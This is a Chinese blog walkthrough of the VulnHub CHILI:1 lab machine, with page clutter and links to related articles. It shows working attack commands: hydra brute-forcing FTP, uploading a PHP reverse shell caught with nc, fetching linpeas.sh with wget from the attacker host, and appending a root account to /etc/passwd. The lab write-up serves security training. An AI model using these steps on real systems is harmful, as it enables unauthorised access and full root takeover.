VulnHub渗透测试实战靶场 - CHILI:1

最新推荐文章于 2024-09-17 00:40:04 发布
最新推荐文章于 2024-09-17 00:40:04 发布
阅读量1.2k 收藏 7
点赞数 1
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/119814235
版权

VulnHub渗透测试实战靶场 - CHILI:1

环境下载

CHILI:1靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.138
  • 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65535 192.168.246.138,发现开放了 21、80 两个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.138

漏洞挖掘

  • 扫描 web 目录没有发现什么有用信息,尝试匿名登录 ftp,发现无法登录
  • F12 查看页面源码,发现可疑信息
  • 尝试利用 Chilichile 作为 ftp 用户名,利用 hydra 爆破密码,得到用户名/密码:chile:a1b2c3d4
hydra -L user.txt -P rockyou.txt -f -V 192.168.246.138 ftp

getshell

  • 用爆破得到的用户名/密码登录 ftp
  • 切换到网站目录 /var/www/html,发现可读可写可执行的 .nano 目录
  • 利用 put 命令,尝试上传 shell 到 .nano 目录中,这里可以直接利用 Kali 自带的 php-shell,修改 $ip$port
cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop
  • shell 文件加权限
chmod +x php-reverse-shell.php
chmod 777 php-reverse-shell.php
  • 起一个 nc 监听,访问 http://192.168/246/138/.nano/php-reverse-shell.php,成功接收到反弹的 shell,并执行命令 SHELL=/bin/bash script -q /dev/null 获得一个交互式 shell

提权

  • 这里借用一个下载辅助提权脚本工具,下载链接,先将该工具上传到网站上
python2 -m SimpleHTTPServer 8888

wget http://192.168.246.129/linpeas.sh
  • linpeas.sh 赋予执行权限后,执行 linpeas.sh
chmod +x linpeas.sh
chmod 777 linpeas.sh
  • 发现了利用的文件为 passwd 文件,可以自己写一个 root 权限的空密码账号进去,再用 passwd 写入密码来进行提权
  • 利用 perl 脚本语言,执行 crypt 模块,将 H3rmesk1t 加密字符串输出
/usr/bin/perl -le 'print crypt("H3rmesk1t","H3rmesk1t")'
  • 将 H3rmesk1t 账户信息写入到 /etc/passwd
echo "H3rmesk1t:H3uwEyrUn4dnU:0:0:ROOT:/root:/bin/bash" >> /etc/passwd
  • 切换到用户 H3rmesk1t 即可获得 root 权限
H3rmesk1t
关注
专栏目录
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1428
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
vulnhubChili 靶机
Nicky_Zheng的博客
01-29 837
1、信息收集 1.1、端口扫描 已通过netdiscover发现靶机 ip:192.168.57.142 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST Nmap scan report for 192.168.57.142 Host
VulnHub靶场CHILI: 1
A_dmin的博客
12-02 883
VulnHub靶场CHILI: 1 扫描IP以及端口: 访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了: 看了看hint,用chili当作用户名试试破解一下密码: 利用hydra破解ftp密码: hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150 得到密码: 成功进入: 进入到/var/www/html下,.nano下可读可写: 上传shell文件,别忘了加权限chmo
渗透测试】——VulnHub靶机渗透实战 | HA:Joker
最新发布
HinsCoder的博客
09-17 1903
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场。本文将从环境搭建、端口扫描、目录扫描到信息提取和突破8080端口,尽可能排除新版本遇到的环境Bug,详解介绍渗透测试全过程。如果你是新手小白,本文将带你一窥渗透测试的世界。
靶机渗透测试Chili
@小张小张的博客
09-25 1732
靶机渗透测试Chili): Vulnhub靶机 Chili 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:192.168.10.88 2. nmap进行
vulnhub靶场,DC-8
kukudeshuo的博客
07-16 532
vulnhub靶场,DC-8 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-8(192.168.58.151) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan -l确定目标靶机 确定目标靶机IP为192.168.58.151 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 网站目录结构扫描 发现robots.txt文件,访问rob
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 2166
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
chili-cookoff:2015 年 Post Graphics 辣椒烹饪大赛
06-29
辣椒烤燃 2015 年 Post Graphics 辣椒烹饪大赛 我们正在为我们的辣椒烹饪构建一个应用程序! 我们之前都没有写过 Node 应用程序! 我们在烹饪开始前 23 小时就开始了! 甚至什么是玉。...cd chili npm install
green-chili-ed367:使用Stackbit创建的Jamstack网站
02-23
:sparkles: 青辣椒 :sparkles: 这是一个使用Git作为的网站。 它是在一分钟内使用创建的。 您可以像这样,或探索一些变体。 如何不同: :artist_palette: 看 :pencil: 不育系 :gear: 静态网站生成器 ...
rainy-chili-ec6f6:用Stackbit创建的Jamstack网站
03-06
月球漫步 一个快速且简约的博客,具有干净的黑暗模式。 基于 特征 带有主题切换器的明暗模式 垂直列表,水平列表,卡列表 带有导航栏,页脚,作品集的登录页面 快速(非常少CSS)-性能,可访问性,最佳做法和SEO均...
e-commerce-red-hot-chilli-guitars:基金会形式
03-07
grupo_8_red-hot-chili-guitars 积分: 卢卡斯·赫兰(Lucas Herlan) 马蒂亚斯·冈萨雷斯(MatíasGonzalez) 达里奥·玛玛尼(DaríoMamani) 塞巴斯蒂安·克拉维克(Sebastian Krawiec) tablero de trello:...
VulnHub靶场LupinOne
I夜白
02-01 5060
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
VulnHub靶场-Tiki
hxync的博客
08-08 994
靶场下载地址:tiki. 下载之后导入virtualbox启动 不能直接看到IP地址 先看一下kali的ip: Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址 再扫一下靶机开放的端口: 开放了22 80 139 445 这四个端口 浏览器访问80端口没有发现什么有用的东西 Dirbuster扫一下目录 浏览器访问一下扫到的robots.txt 发现robots.txt文件里也有扫到的tiki目录,访问一下 发现提示是tikiwikicms 再加上下载靶场时有提示是cve漏洞
Vulnhub-Narak靶场
Longwaer
12-29 975
Vulnhub中Narak靶场学习,通过笔记全方位细致演示,更快的掌握漏洞复现、各种小技巧等。
vulnhub靶场,Tomato
kukudeshuo的博客
07-25 718
vulnhub靶场,Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶机:Tomato:(192.168.109.141) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标哦靶机IP为192.168.109.141 使用nmap扫描查看目标端口开放情况 开
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 1098
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub靶场-VulnOS:2
2302_78903258的博客
08-10 1431
刚开始还以为6667端口能够进行漏洞利用,但是后面发现利用不了,转成探测网站的漏洞。对于探测网站的漏洞,我们要注意它的网页源代码查看提示,查找相关的漏洞进行exp的下载,这里考虑到的是sql注入的漏洞,我们用sqlmap爆破即可,基本权限提升套路都是:下载exp-->>上传exp-->>编译-->>执行。
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1418
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3771
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
ch.qos.logback:logback-class:1.2.3
07-27
引用\[1\]:根据引用\[1\]中提到的问题和解决方案,ch.qos.logback:logback-class:1.2.3可能是一个引起冲突的日志依赖。在解决类似问题时,可以尝试以下步骤来解决冲突: 1. 使用Maven Helper等工具搜索并移除项目中的logback依赖,确保只有一个logback依赖被引入。 2. 如果问题仍然存在,可能是由于其他日志依赖引起的冲突。可以通过搜索log关键字来查找项目中的其他日志依赖,特别是与log4j相关的依赖。 3. 确定是否存在多个日志依赖中的冲突,特别是log4j-api。如果存在冲突,需要手动移除冲突的依赖,以解决冲突问题。 综上所述,如果你遇到了ch.qos.logback:logback-class:1.2.3引起的冲突问题,可以尝试以上方法来解决冲突。 #### 引用[.reference_title] - *1* *2* *3* [记maven冲突导致LF4J: Actual binding is of type [ch.qos.logback.classic.util....](https://blog.csdn.net/shark_chili3007/article/details/123080889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值